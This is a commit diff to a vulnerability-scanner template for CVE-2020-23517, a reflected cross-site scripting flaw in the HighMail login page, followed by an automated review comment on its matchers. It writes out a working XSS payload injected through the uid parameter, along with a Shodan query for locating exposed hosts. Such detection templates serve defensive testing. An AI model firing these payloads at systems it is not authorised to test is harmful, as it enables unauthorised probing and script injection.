Update CVE-2020-23517.yaml
parent
df36c380cd
commit
cfba4d0de9
|
@ -13,21 +13,30 @@ info:
|
||||||
cvss-score: 6.1
|
cvss-score: 6.1
|
||||||
cve-id: CVE-2020-23517
|
cve-id: CVE-2020-23517
|
||||||
cwe-id: CWE-79
|
cwe-id: CWE-79
|
||||||
tags: xss,cve,cve2020
|
metadata:
|
||||||
|
verified: true
|
||||||
|
shodan-query: title:"HighMail"
|
||||||
|
tags: cve,cve2020,xss,cms,highmail
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
|
- "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- text/html
|
- text/html
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- "<img src=\"x\" onerror=\"alert('XSS')"
|
- 'value=""><script>alert(document.domain)</script>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
# Enhanced by mp on 2022/03/14
|
# Enhanced by mp on 2022/03/14
|
||||||
|
|
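Review bot: The second word matcher, the one on `'value=""><script>alert(document.domain)</script>'`, has no `part:` key and so relies on the default of matching the response body, while the matcher above it spells out `part: header`; adding `part: body` there would make the intent explicit. The `text/html` word is also checked against the whole header block rather than the Content-Type header alone, which is looser than it reads, although the and-condition with the body word and the added `status: 200` check keeps the false-positive risk small. The rendered page has lost the YAML indentation, so it cannot be confirmed here that `tags` sits at the `info` level rather than under `metadata`; that is worth checking in the file itself.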